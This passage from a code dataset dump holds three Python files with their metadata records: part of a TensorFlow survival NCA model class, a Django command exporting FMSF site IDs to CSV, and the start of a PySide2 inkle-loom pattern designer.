7, Number 1, January, 2012.\n \n \"\"\"\n \n # Set class attributes\n ###########################################################################\n \n # default graph params\n default_graphParams = {'ALPHA': 0.5,\n 'LAMBDA': 0,\n 'KAPPA': 1.0,\n 'OPTIM': 'GD',\n 'LEARN_RATE': 0.01}\n userspecified_graphParams = ['dim_input',]\n \n \n # Init\n ###########################################################################\n \n def __init__(self, \n RESULTPATH, description=\"\", \n LOADPATH = None):\n \n \"\"\"Instantiate a survival NCA object\"\"\"\n \n if LOADPATH is not None:\n \n # Load existing model\n self.load(LOADPATH)\n \n # overwrite loaded paths\n self.RESULTPATH = RESULTPATH\n \n else:\n \n # Set instance attributes\n #==================================================================\n \n self.RESULTPATH = RESULTPATH\n self.LOGPATH = self.RESULTPATH + \"model/logs/\"\n self.WEIGHTPATH = self.RESULTPATH + \"model/weights/\"\n \n # prefix to all saved results\n self.description = description\n \n # new model inital attributes\n self.Costs_epochLevel_train = []\n self.Costs_epochLevel_valid = []\n #self.Costs_batchLevel_train = []\n #self.Costs_batchLevel_valid = []\n self.BATCHES_RUN = 0\n self.EPOCHS_RUN = 0\n \n # Create output dirs\n #==================================================================\n \n self._makeSubdirs()\n \n # Configure logger - will not work with iPython\n #==================================================================\n \n timestamp = str(datetime.datetime.today()).replace(' ','_')\n logging.basicConfig(filename = self.LOGPATH + timestamp + \"_RunLogs.log\", \n level = logging.INFO,\n format = '%(levelname)s:%(message)s')\n \n \n #%%===========================================================================\n # Miscellaneous methods\n #==============================================================================\n \n # The following load/save methods are inspired by:\n # https://stackoverflow.com/questions/2345151/\n # how-to-save-read-class-wholly-in-python\n \n def save(self):\n \n \"\"\"save relevant attributes as ModelAttributes.pkl\"\"\"\n \n pUtils.Log_and_print(\"Saving relevant attributes ...\")\n\n attribs = self.getModelInfo()\n \n with open(self.RESULTPATH + 'model/' + self.description + \\\n 'ModelAttributes.pkl','wb') as f:\n _pickle.dump(attribs, f)\n \n #==========================================================================\n \n def load(self, LOADPATH):\n \n \"\"\"load ModelAttributes.pkl\"\"\"\n \n print(\"Loading model attributes ...\")\n \n with open(LOADPATH,'rb') as f:\n attribs = _pickle.load(f)\n \n # unpack dict\n self.RESULTPATH = attribs['RESULTPATH']\n self.description = attribs['description']\n self.Costs_epochLevel_train = attribs['Costs_epochLevel_train']\n self.Costs_epochLevel_valid = attribs['Costs_epochLevel_valid']\n #self.Costs_batchLevel_train = attribs['Costs_batchLevel_train']\n #self.Costs_batchLevel_valid = attribs['Costs_batchLevel_valid']\n self.BATCHES_RUN = attribs['BATCHES_RUN']\n self.EPOCHS_RUN = attribs['EPOCHS_RUN']\n self.COMPUT_GRAPH_PARAMS = attribs['COMPUT_GRAPH_PARAMS']\n self.LOGPATH = attribs['LOGPATH']\n self.WEIGHTPATH = attribs['WEIGHTPATH']\n \n #==========================================================================\n \n def getModelInfo(self):\n \n \"\"\" Returns relevant model attributes\"\"\"\n \n attribs = {\n 'RESULTPATH' : self.RESULTPATH,\n 'description' : self.description,\n 'Costs_epochLevel_train': self.Costs_epochLevel_train,\n 'Costs_epochLevel_valid': 
self.Costs_epochLevel_valid,\n #'Costs_batchLevel_train': self.Costs_batchLevel_train,\n #'Costs_batchLevel_valid': self.Costs_batchLevel_valid,\n 'BATCHES_RUN': self.BATCHES_RUN,\n 'EPOCHS_RUN': self.EPOCHS_RUN,\n 'COMPUT_GRAPH_PARAMS': self.COMPUT_GRAPH_PARAMS,\n 'LOGPATH': self.LOGPATH,\n 'WEIGHTPATH': self.WEIGHTPATH,\n }\n \n return attribs\n \n #==========================================================================\n \n def reset_TrainHistory(self):\n \n \"\"\"Resets training history (Costs etc)\"\"\" \n \n self.EPOCHS_RUN = 0\n self.BATCHES_RUN = 0 \n #self.Costs_batchLevel_train = [] \n #self.Costs_batchLevel_valid = []\n self.Costs_epochLevel_train = []\n self.Costs_epochLevel_valid = []\n self.save()\n \n #========================================================================== \n \n def _makeSubdirs(self):\n \n \"\"\" Create output directories\"\"\"\n \n # Create relevant result subdirectories\n pUtils.makeSubdir(self.RESULTPATH, 'plots')\n pUtils.makeSubdir(self.RESULTPATH, 'ranks')\n \n # Create a subdir to save the model\n pUtils.makeSubdir(self.RESULTPATH, 'model')\n pUtils.makeSubdir(self.RESULTPATH + 'model/', 'weights')\n pUtils.makeSubdir(self.RESULTPATH + 'model/', 'logs')\n \n \n #%%============================================================================\n # build computational graph\n #==============================================================================\n \n def _build_computational_graph(self, COMPUT_GRAPH_PARAMS={}):\n \n \"\"\" \n Build the computational graph for this model\n At least, no of dimensions ('D') must be provided\n \"\"\"\n \n # Now that the computationl graph is provided D is always fixed\n self.D = COMPUT_GRAPH_PARAMS['dim_input']\n\n # Params for the computational graph\n self.COMPUT_GRAPH_PARAMS = \\\n pUtils.Merge_dict_with_default(\\\n dict_given = COMPUT_GRAPH_PARAMS,\n dict_default = self.default_graphParams,\n keys_Needed = self.userspecified_graphParams)\n \n # instantiate computational graph\n graph = cgraph.comput_graph(**self.COMPUT_GRAPH_PARAMS)\n \n return graph\n \n \n #%%============================================================================\n # Run session \n #==============================================================================\n \n def train(self, \n features, survival, censored,\n features_valid = None, \n survival_valid = None, \n censored_valid = None,\n COMPUT_GRAPH_PARAMS={},\n BATCH_SIZE = 20,\n PLOT_STEP = 10,\n MODEL_SAVE_STEP = 10,\n MAX_ITIR = 100):\n \n \"\"\"\n train a survivalNCA model\n features - (N,D) np array\n survival and censored - (N,) np array\n \"\"\"\n \n pUtils.Log_and_print(\"Training survival NCA model.\")\n \n \n # Initial preprocessing and sanity checks\n #====================================================================== \n \n pUtils.Log_and_print(\"Initial preprocessing.\")\n \n assert len(features.shape) == 2\n assert len(survival.shape) == 1\n assert len(censored.shape) == 1\n \n USE_VALID = False\n if features_valid is not None:\n USE_VALID = True\n assert (features_valid.shape[1] == features.shape[1])\n assert (survival_valid is not None)\n assert (censored_valid is not None)\n \n #\n # Z-scoring survival (for numerical stability with optimizer)\n #\n \n # Combine training and validation (for comparability)\n survival_all = survival[:, None]\n if USE_VALID:\n survival_all = np.concatenate((survival_all, \n survival_valid[:, None]), axis=0)\n\n # z-score combined\n survival_all = (survival_all - np.mean(survival_all)) / np.std(survival_all)\n\n # separate out\n 
survival = survival_all[0:len(survival), 0]\n if USE_VALID: \n survival_valid = survival_all[len(survival):, 0]\n \n\n # Define computational graph\n #====================================================================== \n \n COMPUT_GRAPH_PARAMS['dim_input'] = features.shape[1]\n graph = self._build_computational_graph(COMPUT_GRAPH_PARAMS)\n \n \n # Begin session\n #====================================================================== \n\n pUtils.Log_and_print(\"Running TF session.\")\n\n with tf.Session() as sess:\n \n \n # Initial ground work\n #==================================================================\n \n # op to save/restore all the variables\n saver = tf.train.Saver()\n \n if \"checkpoint\" in os.listdir(self.WEIGHTPATH):\n # load existing weights \n pUtils.Log_and_print(\"Restoring saved model ...\") \n saver.restore(sess, self.WEIGHTPATH + self.description + \".ckpt\")\n pUtils.Log_and_print(\"Model restored.\") \n \n else: \n # start a new model\n sess.run(tf.global_variables_initializer())\n \n # for tensorboard visualization\n #train_writer = tf.summary.FileWriter(self.RESULTPATH + 'model/tensorboard', \n # sess.graph)\n\n # Define some methods\n #==================================================================\n\n\n # periodically save model\n def _saveTFmodel():\n\n \"\"\"Saves model weights using tensorflow saver\"\"\"\n \n # save weights \n pUtils.Log_and_print(\"\\nSaving TF model weights...\")\n save_path = saver.save(sess, \\\n self.WEIGHTPATH + self.description + \".ckpt\")\n pUtils.Log_and_print(\"Model saved in file: %s\" % save_path)\n \n # save attributes\n self.save()\n \n \n # monitor\n def _monitorProgress():\n\n \"\"\"Monitor cost\"\"\"\n \n cs = np.array(self.Costs_epochLevel_train)\n epoch_no = np.arange(len(cs))\n cs = np.concatenate((epoch_no[:, None], cs), axis=1)\n \n cs_valid = None\n if USE_VALID:\n cs_valid = np.array(self.Costs_epochLevel_valid)\n \n self._plotMonitor(arr= cs, arr2= cs_valid,\n title= \"cost vs. 
epoch\", \n xlab= \"epoch\", ylab= \"cost\", \n savename= self.RESULTPATH + \"plots/\" +\n self.description + \"cost.svg\")\n\n \n # Begin epochs\n #==================================================================\n \n try: \n itir = 0\n while itir < MAX_ITIR:\n \n #pUtils.Log_and_print(\"\\n\\tTraining epoch {}\\n\".format(self.EPOCHS_RUN))\n \n itir += 1\n cost_tot = 0\n cost_tot_valid = 0\n \n # Shuffle so that training batches differ every epoch\n #==========================================================\n \n idxs = np.arange(features.shape[0]);\n np.random.shuffle(idxs)\n features = features[idxs, :]\n survival = survival[idxs]\n censored = censored[idxs]\n \n # Divide into balanced batches\n #==========================================================\n \n # Get balanced batches (if relevant)\n if BATCH_SIZE < censored.shape[0]:\n batchIdxs = dm.get_balanced_batches(censored, BATCH_SIZE = BATCH_SIZE)\n else:\n batchIdxs = [np.arange(censored.shape[0])]\n \n if USE_VALID:\n batchIdxs_valid = \\\n dm.get_balanced_batches(censored_valid, BATCH_SIZE = BATCH_SIZE) \n \n # Run over training set\n #==========================================================\n \n for batchidx, batch in enumerate(batchIdxs):\n \n # Getting at-risk groups\n t_batch, o_batch, at_risk_batch, x_batch = \\\n sUtils.calc_at_risk(survival[batch], \n 1-censored[batch],\n features[batch, :])\n \n # run optimizer and fetch cost\n \n feed_dict = {graph.X_input: x_batch,\n graph.T: t_batch,\n graph.O: o_batch,\n graph.At_Risk: at_risk_batch,\n } \n \n _, cost = sess.run([graph.optimizer, graph.cost], \\\n feed_dict = feed_dict)\n \n # normalize cost for sample size\n cost = cost / len(batch)\n \n # record/append cost\n #self.Costs_batchLevel_train.append(cost) \n cost_tot += cost \n \n #pUtils.Log_and_print(\"\\t\\tTraining: Batch {} of {}, cost = {}\".\\\n # format(batchidx, len(batchIdxs)-1, round(cost[0], 3)))\n \n\n # Run over validation set\n #==========================================================\n if USE_VALID: \n for batchidx, batch in enumerate(batchIdxs_valid):\n \n # Getting at-risk groups\n t_batch, o_batch, at_risk_batch, x_batch = \\\n sUtils.calc_at_risk(survival[batch], \n 1-censored[batch],\n features[batch, :])\n \n # fetch cost\n \n feed_dict = {graph.X_input: x_batch,\n graph.T: t_batch,\n graph.O: o_batch,\n graph.At_Risk: at_risk_batch,\n } \n \n cost = sess.run(graph.cost, feed_dict = feed_dict)\n \n # normalize cost for sample size\n cost = cost / len(batch)\n \n # record/append cost\n #self.Costs_batchLevel_valid.append(cost)\n cost_tot_valid += cost\n \n pUtils.Log_and_print(\"\\t\\tValidation: Batch {} of {}, cost = {}\".\\\n format(batchidx, len(batchIdxs_valid)-1, round(cost[0], 3)))\n\n # Update and save \n #==========================================================\n \n # update epochs and append costs \n self.EPOCHS_RUN += 1\n self.Costs_epochLevel_train.append(cost_tot)\n if USE_VALID:\n self.Costs_epochLevel_valid.append(cost_tot_valid) \n \n\n # periodically save model\n #if (self.EPOCHS_RUN % MODEL_SAVE_STEP) == 0:\n # _saveTFmodel() \n \n # periodically monitor progress\n if (self.EPOCHS_RUN % PLOT_STEP == 0) and \\\n (self.EPOCHS_RUN > 0):\n _monitorProgress() \n \n except KeyboardInterrupt:\n pass\n \n # save final model and plot costs\n #_saveTFmodel()\n _monitorProgress()\n\n pUtils.Log_and_print(\"\\nFinished training model.\")\n pUtils.Log_and_print(\"Obtaining final results.\")\n \n # save learned weights\n #w = sess.run(graph.w, feed_dict = feed_dict)\n 
#np.save(self.RESULTPATH + 'model/' + self.description + \\\n # 'featWeights.npy', w)\n W = sess.run(graph.W, feed_dict = feed_dict)\n \n return W\n\n \n #%%============================================================================\n # Rank features\n #==============================================================================\n\n \n# def rankFeats(self, X, fnames, rank_type = \"weights\"):\n# \n# \"\"\" ranks features by feature weights or variance after transform\"\"\"\n# \n# print(\"Ranking features by \" + rank_type)\n# \n# fidx = np.arange(self.D).reshape(self.D, 1) \n# \n# w = np.load(self.RESULTPATH + 'model/' + self.description + 'featWeights.npy') \n# \n# if rank_type == 'weights':\n# # rank by feature weight\n# ranking_metric = w[:, None]\n# elif rank_type == 'stdev':\n# # rank by variance after transform\n# W = np.zeros([self.D, self.D])\n# np.fill_diagonal(W, w)\n# X = np.dot(X, W)\n# ranking_metric = np.std(X, 0).reshape(self.D, 1)\n# \n# ranking_metric = np.concatenate((fidx, ranking_metric), 1) \n# \n# # Plot feature weights/variance\n# if self.D <= 500:\n# n_plot = ranking_metric.shape[0]\n# else:\n# n_plot = 500\n# self._plotMonitor(ranking_metric[0:n_plot,:], \n# \"feature \" + rank_type, \n# \"feature_index\", rank_type, \n# self.RESULTPATH + \"plots/\" + self.description + \n# \"feat_\" + rank_type+\"_.svg\")\n# \n# # rank features\n# \n# if rank_type == \"weights\":\n# # sort by absolute weight but keep sign\n# ranking = ranking_metric[np.abs(ranking_metric[:,1]).argsort()][::-1]\n# elif rank_type == 'stdev': \n# ranking = ranking_metric[ranking_metric[:,1].argsort()][::-1]\n# \n# fnames_ranked = fnames[np.int32(ranking[:,0])].reshape(self.D, 1)\n# fw = ranking[:,1].reshape(self.D, 1) \n# fnames_ranked = np.concatenate((fnames_ranked, fw), 1)\n# \n# # save results\n# \n# savename = self.RESULTPATH + \"ranks/\" + self.description +\\\n# rank_type + \"_ranked.txt\"\n# with open(savename,'wb') as f:\n# np.savetxt(f,fnames_ranked,fmt='%s', delimiter='\\t')\n\n \n #%%============================================================================\n # Visualization methods\n #==============================================================================\n \n def _plotMonitor(self, arr, title, xlab, ylab, savename, arr2 = None):\n \n \"\"\" plots cost/other metric to monitor progress \"\"\"\n \n #print(\"Plotting \" + title)\n #\n #fig, ax = plt.subplots() \n #ax.plot(arr[:,0], arr[:,1], 'b', linewidth=1.5, aa=False)\n #if arr2 is not None:\n # ax.plot(arr[:,0], arr2, 'r', linewidth=1.5, aa=False)\n #plt.title(title, fontsize =16, fontweight ='bold')\n #plt.xlabel(xlab)\n #plt.ylabel(ylab) \n #plt.tight_layout()\n #plt.savefig(savename)\n #plt.close()\n \n #\n # Saving instead of plotting to avoid\n # Xdisplay issues when using screen\n #\n print(\"Saving \" + title)\n with open(savename.split('.')[0] + '.txt', 'wb') as f:\n np.savetxt(f, arr, fmt='%s', delimiter='\\t')\n\n #========================================================================== \n \n#%% ###########################################################################\n#%% ###########################################################################\n#%% ###########################################################################\n#%% 
###########################################################################\n","sub_path":"junk/0_NCA_model_experimental_old.py","file_name":"0_NCA_model_experimental_old.py","file_ext":"py","file_size_in_byte":23471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"297146859","text":"import os\nimport csv\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\nfrom arches.app.models.resource import Resource\nfrom arches.app.models.graph import Graph\n\nclass Command(BaseCommand):\n\n help = 'export all of the FMSF site ids from resources in the database'\n\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n \n site_models = [\n \"Archaeological Site\",\n \"Historic Cemetery\",\n \"Historic Structure\"\n ]\n \n for g in Graph.objects.all():\n if not g.name in site_models:\n continue\n\n sites = [i for i in Resource.objects.all() if i.graph_id == g.pk]\n\n print(\"{} Count: {}\".format(g.name, len(sites)))\n \n fname = \"ids-{}.csv\".format(g.name.replace(\" \",\"\"))\n with open(os.path.join(settings.LOG_DIR, fname), \"wb\") as out:\n writer = csv.writer(out)\n writer.writerow([\"ResourceID\",\"FMSF ID\"])\n for s in sites:\n writer.writerow([s.resourceinstanceid, s.get_node_values(\"FMSF ID\")[0]])\n ","sub_path":"fpan/management/commands/export_fmsf_siteids.py","file_name":"export_fmsf_siteids.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"200541891","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n__author__ = 'brian'\n\nfrom PySide2.QtWidgets import QApplication, QWidget, QPushButton, QFrame, QGridLayout, QColorDialog, QLabel, \\\n QVBoxLayout, QHBoxLayout, QSpacerItem, QCheckBox, QMainWindow, QAction, QFileDialog, QMessageBox\n\nfrom PySide2.QtGui import QFont, QIcon\nfrom PySide2.QtCore import *\nfrom guppy import hpy\nfrom foreground import get_foreground\nfrom functools import partial\nimport os.path\nimport inspect\nimport pickle\nimport sys\n\n\ndef dump_args(func):\n \"\"\"Decorator to print function call details - parameters names and effective values.\n \"\"\"\n\n def wrapper(*args, **kwargs):\n func_args = inspect.signature(func).bind(*args, **kwargs).arguments\n func_args_str = ', '.join('{} = {!r}'.format(*item) for item in func_args.items())\n print(f'{func.__module__}.{func.__qualname__} ( {func_args_str} )')\n return func(*args, **kwargs)\n\n return wrapper\n\n\nclass ColourButton(QPushButton):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setStyleSheet(\"\"\" MyButton { \n border - style: outset;\n border - width: 50 px;\n border - radius: 2000px;\n border - color: white;\n padding: 4 px;\n font: bold;\n font-size: 36px;\n }\"\"\")\n\n self.colour = self.palette().button().color().name()\n self.inital_colour = self.colour\n\n def setColour(self, col, *textcol):\n try:\n tcol = textcol[0] if textcol else 'black'\n s = \"QPushButton {background-color: \" + col + \"; color: \" + tcol + \";}\"\n self.setStyleSheet(s)\n self.colour = col\n except TypeError:\n pass\n\n def getColour(self):\n return self.colour\n\n\nclass YarnPalette():\n def __init__(self, yarn_ct):\n self.yarns = []\n self.yarn_lock = False\n self.create_yarns(yarn_ct)\n self.current_yarn_index = 0\n\n\n def create_yarns(self, yarn_ct):\n for yarn_no in range(yarn_ct):\n yarn = self.Yarn()\n yarn.index = yarn_no\n 
self.yarns.append(yarn)\n\n def change_yarn_colour(self, x, yarn_lock):\n yarn = self.yarns[x]\n if not yarn_lock:\n dialog_col = QColorDialog.getColor()\n if dialog_col.isValid():\n new_col = dialog_col.name()\n yarn.setColour(new_col)\n self.yarns[self.current_yarn_index].clear_current_marker()\n yarn.set_current_marker()\n self.current_yarn_index = x\n\n # text_colour = get_foreground(yarn.getColour())\n # yarn.setColour(yarn.getColour(), text_colour)\n # yarn.setFont(self.checkFont)\n # self.yarns[self.current_yarn_index].setText('')\n # yarn.setText(u'\\u2713')\n\n class Yarn(ColourButton):\n def __init__(self):\n ColourButton.__init__(self)\n self.index = None\n self.inuse = False\n self.checkFont = QFont()\n self.checkFont.setBold(True)\n self.checkFont.setPointSize(18)\n\n def reinitialise(self):\n self.setColour(self.inital_colour)\n self.inuse = False\n self.setText('')\n\n def set_colour_marker(self):\n text_colour = get_foreground(self.getColour())\n self.setColour(self.getColour(), text_colour)\n self.setFont(self.checkFont)\n self.setText(u'\\u2713')\n\n def clear_colour_marker(self):\n self.setText('')\n\n def reload(self, load_data, current_yarn):\n self.setColour(load_data[\"colour\"])\n self.inuse = load_data[\"inuse\"]\n txt = u'\\u2713' if self.index == current_yarn else ''\n self.setFont(self.checkFont)\n self.setText(txt)\n\n\nclass Loom():\n def __init__(self, max_warp_threads, pick_ct):\n self.warp_threads = []\n self.warp_thread_ct = 0\n self.max_warp_threads = max_warp_threads\n self.pick_ct = pick_ct\n\n def add_warp_thread(self):\n if self.warp_thread_ct < self.max_warp_threads:\n warp_thread = self.WarpThread(self.pick_ct)\n warp_thread.index = self.warp_thread_ct\n warp_thread.isHeddled = True if warp_thread.index % 2 == 0 else False\n self.warp_threads.append(warp_thread)\n self.set_alt_warp_threads()\n self.warp_thread_ct += 1\n return True\n else:\n return False\n\n def remove_warp_thread(self):\n if self.warp_thread_ct > 0:\n self.warp_thread_ct -= 1\n warp_thread = self.warp_threads[self.warp_thread_ct]\n for pick in warp_thread.picks:\n pick.setParent(None)\n # pick.deleteLater()\n del pick\n warp_thread.setParent(None)\n if not warp_thread.isHeddled:\n alt_heddled_thread = self.warp_threads[self.warp_thread_ct - 1]\n alt_heddled_thread.pickup_yarn_index = None\n for pick in alt_heddled_thread.picks:\n pick.set_display_colour(alt_heddled_thread, None)\n # warp.deleteLater()\n del warp_thread\n return True\n else:\n return False\n\n def set_alt_warp_threads(self):\n for warp_thread in self.warp_threads:\n alt_warp_thread_index = warp_thread.index + 1 if warp_thread.isHeddled else warp_thread.index - 1\n try:\n warp_thread.pickup_yarn_index = self.warp_threads[alt_warp_thread_index]\n except IndexError:\n warp_thread.pickup_yarn_index = None\n\n def reload(self, load_data, yarns):\n self.set_alt_warp_threads()\n for data in load_data:\n self.warp_threads[data[\"index\"]].reload(data, yarns)\n for warp_thread in self.warp_threads:\n warp_thread.reload_pick_colours()\n\n def change_warp_colour(self, yarn):\n for warp_thread in self.warp_threads:\n if warp_thread.yarn_index == yarn.index:\n warp_thread.new_colour(yarn)\n\n class WarpThread(ColourButton):\n def __init__(self, pick_ct):\n ColourButton.__init__(self)\n self.index = None\n self.yarn_index = None\n self.alt_warp_thread = None\n self.isHeddled = True\n self.pick_ct = pick_ct\n self.picks = []\n for pick_no in range(self.pick_ct):\n pick = self.Pick()\n pick.index = pick_no\n 
self.picks.append(pick)\n\n def new_colour(self, yarn):\n self.yarn_index = yarn.index\n self.setColour(yarn.getColour())\n for pick in self.picks:\n pick.set_display_colour(self, self.alt_warp_thread)\n\n def toggle_pick(self, pick_index):\n self.picks[pick_index].toggle_pick(self, self.alt_warp_thread)\n\n def reintialise(self):\n self.setColour(self.inital_colour)\n self.yarn_index = None\n for pick in self.picks:\n pick.reinitialise()\n\n def reload(self, data, yarns):\n self.pick_ct = len(data[\"picks\"])\n for pick in self.picks:\n pick.reload(data[\"picks\"][pick.index])\n try:\n self.new_colour(yarns[data[\"yarn_index\"]])\n except TypeError:\n self.setColour(self.inital_colour)\n\n def reload_pick_colours(self):\n for pick in self.picks:\n pick.set_display_colour(self, self.alt_warp_thread)\n\n class Pick(ColourButton):\n def __init__(self):\n ColourButton.__init__(self)\n self.index = None\n self.isPicked = False\n\n def set_display_colour(self, warp_thread, alt_warp_thread):\n if not self.isPicked:\n self.setColour(warp_thread.getColour())\n else:\n try:\n self.setColour(alt_warp_thread.getColour())\n except AttributeError:\n self.setColour(warp_thread.getColour())\n\n def toggle_pick(self, warp_thread, alt_warp_thread):\n self.isPicked = not self.isPicked\n self.set_display_colour(warp_thread, alt_warp_thread)\n\n def reinitialise(self):\n self.setColour(self.inital_colour)\n self.isPicked = False\n\n def reload(self, load_data):\n self.isPicked = load_data[\"isPicked\"]\n\n\nclass Window(QMainWindow):\n def __init__(self):\n super(Window, self).__init__()\n self.setWindowTitle(os.path.splitext(os.path.basename(__file__))[0])\n self.add_menu()\n self.setFixedSize(1200, 700)\n self.titleFont = QFont()\n self.titleFont.setBold(True)\n self.titleFont.setPointSize(16)\n self.yarns = YarnPalette(12)\n for yarn in self.yarns.yarns:\n yarn.clicked.connect(\n lambda checked=yarn.isChecked(), x=yarn.index: self.change_yarn_colour(x, self.yarns.yarn_lock))\n self.current_yarn_index = None\n self.yarn_lock = QCheckBox(\"Lock Colours\")\n self.yarn_lock.stateChanged.connect(self.yarn_lock_changed)\n self.yarn_frame = QFrame(self)\n self.design_yarn_frame()\n self.loom_frame = QFrame(self)\n self.loom_add_warp_thread_btn = QPushButton(self.loom_frame)\n self.loom_remove_warp_thread_btn = QPushButton(self.loom_frame)\n self.design_loom_frame()\n self.band_frame = QFrame(self)\n self.band_title = QLabel(self.band_frame)\n self.design_band_frame()\n self.loom = Loom(80, 20)\n self.warp_thread_ct = 0\n self.initial_warp_ct = 12\n self.create_initial_warp(self.initial_warp_ct)\n\n def create_initial_warp(self, number_of_warps):\n for warp_no in range(number_of_warps):\n self.add_warp_thread(warp_no)\n\n def design_yarn_frame(self):\n self.yarn_frame.setFrameShape(QFrame.StyledPanel)\n self.yarn_frame.setGeometry(0, 20, 200, 180)\n yarn_box = QVBoxLayout()\n title = QLabel(\"Yarns\")\n title.setFont(self.titleFont)\n title.setAlignment(Qt.AlignCenter)\n yarn_box.addWidget(title)\n yarn_grid = QGridLayout()\n yarn_grid.setColumnStretch(1, 4)\n yarn_grid.setColumnStretch(2, 4)\n yarn_grid.setColumnStretch(3, 4)\n for yarn in self.yarns.yarns:\n yarn.setFixedSize(35, 30)\n yarn_grid.addWidget(yarn)\n yarn_box.addLayout(yarn_grid)\n yarn_lock_box = QHBoxLayout()\n yarn_lock_box.addWidget(self.yarn_lock)\n yarn_box.addLayout(yarn_lock_box)\n self.yarn_frame.setLayout(yarn_box)\n\n def design_loom_frame(self):\n self.loom_frame.setFrameShape(QFrame.StyledPanel)\n self.loom_frame.setGeometry(200, 20, 
1000, 180)\n title = QLabel(self.loom_frame)\n title.setText(\"Loom\")\n title.setGeometry(400, 14, 200, 20)\n title.setFont(self.titleFont)\n self.loom_add_warp_thread_btn.setText(\"Thread +\")\n self.loom_add_warp_thread_btn.move(10, 40)\n self.loom_add_warp_thread_btn.clicked.connect(lambda: self.add_warp_thread(self.warp_thread_ct))\n self.loom_remove_warp_thread_btn.setText(\"Thread -\")\n self.loom_remove_warp_thread_btn.move(910, 40)\n self.loom_remove_warp_thread_btn.clicked.connect(lambda: self.remove_warp_thread())\n\n def design_band_frame(self):\n self.band_frame.setFrameShape(QFrame.StyledPanel)\n self.band_frame.setGeometry(0, 200, 1200, 500)\n self.band_title.setText(\"Band\")\n self.band_title.setGeometry(600, 14, 200, 20)\n self.band_title.setFont(self.titleFont)\n\n def yarn_lock_changed(self, state):\n self.yarns.yarn_lock = True if state == Qt.Checked else False\n\n def change_yarn_colour(self, x, yarn_lock):\n self.yarns.change_yarn_colour(x, yarn_lock)\n self.loom.change_warp_colour(self.yarns.yarns[x])\n\n def display_warp_thread(self, warp_thread):\n warp_thread.resize(10, 30)\n x_offset = 100\n y_offset = 80\n warp_thread.setParent(self.loom_frame)\n y = y_offset if warp_thread.isHeddled else y_offset + 30\n warp_thread.move(x_offset + warp_thread.index * 10, y)\n warp_thread.show()\n for pick in warp_thread.picks:\n pick.resize(28, 11)\n x_offset = 20\n y_offset = 50\n pick.setParent(self.band_frame)\n x = x_offset if warp_thread.isHeddled else x_offset + 29\n y = y_offset if warp_thread.isHeddled else y_offset + 5\n pick.move(x + 58 * pick.index, y + 11 * (warp_thread.index // 2))\n pick.show()\n\n def add_warp_thread(self, warp_no):\n if self.loom.add_warp_thread():\n self.loom.warp_threads[warp_no].clicked.connect(\n lambda checked=self.loom.warp_threads[warp_no].isChecked(), x=warp_no: self.set_warp_colour(x))\n for pick in self.loom.warp_threads[warp_no].picks:\n pick.clicked.connect(\n lambda checked=pick.isChecked(), x=warp_no, y=pick.index: self.pickup_single_thread(x, y))\n self.display_warp_thread(self.loom.warp_threads[warp_no])\n self.warp_thread_ct += 1\n\n def remove_warp_thread(self):\n if self.loom.remove_warp_thread():\n self.warp_thread_ct -= 1\n\n # def change_yarn_colour(self, yarn_no):\n # clicked_yarn = self.yarns[yarn_no]\n # if clicked_yarn.change_colour(self.yarn_lock.isChecked()):\n # try:\n # prev_yarn = self.yarns[self.current_yarn_index]\n # prev_yarn.clear_colour_marker()\n # except TypeError:\n # pass\n # clicked_yarn.set_colour_marker()\n # self.current_yarn_index = yarn_no\n # self.change_warp_colour(clicked_yarn)\n\n def set_warp_colour(self, clicked_warp_no):\n yarn = self.yarns.yarns[self.yarns.current_yarn_index]\n self.loom.warp_threads[clicked_warp_no].new_colour(yarn)\n\n def change_warp_colour(self, yarn):\n self.loom.change_warp_colour(yarn)\n\n def pickup_single_thread(self, warp_no, clicked_pick_no):\n self.loom.warp_threads[warp_no].toggle_pick(clicked_pick_no)\n\n def add_menu(self):\n newAction = QAction('&New', self)\n newAction.setShortcut('Ctrl+N')\n newAction.setStatusTip('New document')\n newAction.triggered.connect(self.newCall)\n\n openAction = QAction('&Open', self)\n openAction.setShortcut('Ctrl+O')\n openAction.setStatusTip('Open document')\n openAction.triggered.connect(self.openCall)\n\n saveAction = QAction('&Save', self)\n saveAction.setShortcut('Ctrl+O')\n saveAction.setStatusTip('Save design')\n saveAction.triggered.connect(self.saveCall)\n\n exitAction = QAction('&Exit', self)\n 
exitAction.setShortcut('Ctrl+Q')\n        exitAction.setStatusTip('Exit application')\n        exitAction.triggered.connect(self.exitCall)\n\n        menuBar = self.menuBar()\n        fileMenu = menuBar.addMenu('&File')\n        fileMenu.addAction(newAction)\n        fileMenu.addAction(openAction)\n        fileMenu.addAction(saveAction)\n        fileMenu.addAction(exitAction)\n        printMenu = menuBar.addMenu('&Print')\n\n    def openCall(self):\n        picklefile, _ = QFileDialog().getOpenFileName(self, \"Load Inkle Pattern\", \"./Patterns\",\n                                                      \"Inkle Pattern Files (*.ik2)\",\n                                                      options=QFileDialog.DontUseNativeDialog)\n        load_dump = pickle.load(open(picklefile, \"rb\"))\n        load_main = load_dump[\"save_main\"]\n        load_yarns = load_dump[\"save_yarns\"]\n        load_loom = load_dump[\"save_loom\"]\n        self.band_title.setText(load_main[\"title\"]) # update the label text instead of overwriting the QLabel itself\n        self.current_yarn_index = load_main[\"current_yarn\"]\n        self.yarn_lock.setChecked(load_main[\"yarn_lock\"])\n        load_thread_ct = load_main[\"thread_ct\"]\n        for yarn in self.yarns.yarns: # YarnPalette itself is not iterable; iterate its yarn list\n            yarn.reload(load_yarns[yarn.index], self.current_yarn_index)\n        while self.warp_thread_ct > load_thread_ct:\n            self.remove_warp_thread()\n        for warp_no in range(self.warp_thread_ct, load_thread_ct):\n            self.add_warp_thread(warp_no)\n        self.loom.reload(load_loom, self.yarns.yarns) # Loom.reload indexes into a plain list of yarns\n        self.warp_thread_ct = load_thread_ct\n\n    def newCall(self):\n        self.band_title.setText(\"Band\")\n        self.current_yarn_index = None\n        self.yarn_lock.setChecked(False)\n        for yarn in self.yarns.yarns:\n            yarn.reinitialise()\n        while self.warp_thread_ct > 12:\n            self.remove_warp_thread()\n        for warp_thread in self.loom.warp_threads:\n            warp_thread.reintialise()\n        for warp_no in range(self.warp_thread_ct, 12):\n            